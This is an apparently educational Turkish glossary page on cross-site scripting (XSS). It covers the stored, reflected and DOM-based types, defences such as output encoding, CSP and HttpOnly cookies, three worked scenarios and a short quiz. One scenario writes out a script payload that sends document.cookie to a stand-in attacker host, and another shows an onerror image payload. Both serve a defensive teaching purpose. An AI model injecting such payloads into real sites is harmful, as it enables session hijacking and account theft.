XSS (Siteler Arası Betik) nedir? — Bilgi Güvenliği Sözlüğü

Kötü Amaçlı Yazılım & Saldırılar

XSS (Siteler Arası Betik)

👤 Güvenlik Uzmanı★ 1/3⏱ 5 dk

İnteraktif sahne yükleniyor…

🎯 Neden önemli?

Bir yorum kutusuna yazdığınız küçük bir <script> etiketi, o sayfayı açan herkesin oturum çerezini saldırgana gönderebilir — XSS, web'in en yaygın ve en sinsi açıklarından biridir.

Anlatım

NEDİR? XSS (Cross-Site Scripting / Siteler Arası Betik Çalıştırma), bir saldırganın güvenilir bir web sitesine kendi zararlı JavaScript kodunu enjekte etmesi ve bu kodun, siteyi ziyaret eden başka kullanıcıların tarayıcısında çalıştırılması açığıdır. Saldırı kullanıcının tarayıcısında, sitenin kendi alan adı (origin) yetkisiyle çalıştığı için tarayıcı bu kodu güvenilir kabul eder. Temel kök neden: uygulamanın, kullanıcıdan gelen veriyi yeterince doğrulamadan/temizlemeden (sanitize) HTML çıktısına yerleştirmesidir. NASIL ÇALIŞIR? 1) Saldırgan, bir giriş alanına (yorum, arama kutusu, profil adı, URL parametresi) HTML/JavaScript içeren bir veri girer; örn. <script>...</script> ya da bir olay işleyici (onerror, onload). 2) Uygulama bu veriyi olduğu gibi saklar veya doğrudan sayfaya basar (encode etmez). 3) Sayfa başka bir kullanıcı tarafından açıldığında, tarayıcı enjekte edilen kodu sayfanın meşru bir parçası sanarak çalıştırır. 4) Çalışan kod; oturum çerezlerini (document.cookie) çalabilir, sahte formlar gösterebilir, tuş vuruşlarını dinleyebilir veya kullanıcı adına istek gönderebilir. TÜRLERİ • Depolanan (Stored/Persistent) XSS: Zararlı kod sunucu veritabanına kaydedilir (örn. bir forum yorumu) ve sayfayı açan herkeste tetiklenir. En tehlikelisidir. • Yansıtılan (Reflected) XSS: Kod istekle (URL parametresi) gönderilir ve yanıtta anında geri yansıtılır; genelde kurbana özel hazırlanmış bir link ile tetiklenir. • DOM tabanlı XSS: Sunucu hiç görmeden, tamamen tarayıcıdaki JavaScript'in güvenilmeyen veriyi DOM'a (innerHTML gibi) yazmasıyla oluşur. NEDEN ÖNEMLİ / İŞ YERİNDE XSS, OWASP listesinde yıllardır en sık görülen web açıkları arasındadır. Sonuçları: oturum çalma (hesap ele geçirme), kimlik avı sayfası enjeksiyonu, sahte işlem yaptırma, kurumsal itibar ve KVKK/GDPR ihlali riski. Bir e-ticaret veya bankacılık panelinde tek bir Stored XSS, binlerce kullanıcının hesabını riske atabilir. DİKKAT / İYİ UYGULAMA • Çıktı kodlama (output encoding): Kullanıcı verisini HTML, JavaScript veya URL bağlamına basmadan önce bağlama uygun şekilde encode et (ör. < → <). • Girdi doğrulama (allow-list): Yalnızca beklenen formatı kabul et. • Content Security Policy (CSP): Çalışacak betik kaynaklarını kısıtla; satır-içi (inline) script'i engelle. • Çerezlerde HttpOnly bayrağı: JavaScript'in oturum çerezine erişimini engeller. • innerHTML yerine textContent kullan; framework'lerin (React, Angular) otomatik kaçış mekanizmalarını devre dışı bırakma (dangerouslySetInnerHTML'den kaçın).

📌 Senaryolar

📌 Örnek 1: Bir blog sitesinin yorum alanına kullanıcı '<script>fetch("https://kotu.site/c?"+document.cookie)</script>' yazıyor ve uygulama bunu temizlemeden veritabanına kaydedip diğer ziyaretçilere gösteriyor.
  Açıklama: Bu bir Depolanan (Stored) XSS'tir. Yorumu görüntüleyen her kullanıcının tarayıcısında script çalışır ve oturum çerezi saldırganın sunucusuna sızdırılır. Çözüm: yorum metnini çıktıda HTML-encode etmek ve HttpOnly çerez kullanmak.

📌 Örnek 2: Bir arama sayfası, 'site.com/ara?q=aranan' adresindeki q parametresini sonuç başlığında 'Şunu aradınız: aranan' biçiminde doğrudan basıyor. Saldırgan kurbana 'site.com/ara?q=<img src=x onerror=alert(1)>' linkini gönderiyor.
  Açıklama: Bu Yansıtılan (Reflected) XSS'tir. Geçersiz görsel yüklenemeyince onerror olayı tetiklenip script çalışır. Kurban linke tıkladığında kod kendi tarayıcısında işler. Çözüm: parametreyi yansıtmadan önce encode etmek.

📌 Örnek 3: Bir tek-sayfa uygulaması (SPA), URL'deki '#mesaj=...' kısmını JavaScript ile okuyup 'document.getElementById("kutu").innerHTML = mesaj' şeklinde sayfaya yazıyor.
  Açıklama: Bu DOM tabanlı XSS'tir; veri sunucuya hiç gitmeden tarayıcıdaki kod tarafından güvenilmeden DOM'a basılır. Çözüm: innerHTML yerine textContent kullanmak ya da DOMPurify gibi bir kütüphane ile temizlemek.

Özet

• XSS: güvenilir bir siteye enjekte edilen zararlı betiğin, başka kullanıcıların tarayıcısında o sitenin yetkisiyle çalışmasıdır. • Üç tür vardır: Depolanan (en tehlikeli), Yansıtılan ve DOM tabanlı. • En sık sonuç: oturum çerezi/hesap çalma, kimlik avı ve sahte işlem. • Savunma: bağlama uygun çıktı kodlama, girdi doğrulama, Content Security Policy ve HttpOnly çerezler.

✅ Mini-Test (3)

1.XSS saldırısında zararlı kod nerede çalışır?

2.Aşağıdaki önlemlerden hangisi XSS'e karşı temel ve en doğrudan savunmadır?

3.Depolanan (Stored) XSS, zararlı kodu sunucuda saklayıp sayfayı açan tüm kullanıcılarda tetiklediği için genellikle yansıtılan XSS'ten daha tehlikelidir.

← Tüm sözlük terimleri · Farkındalık eğitimi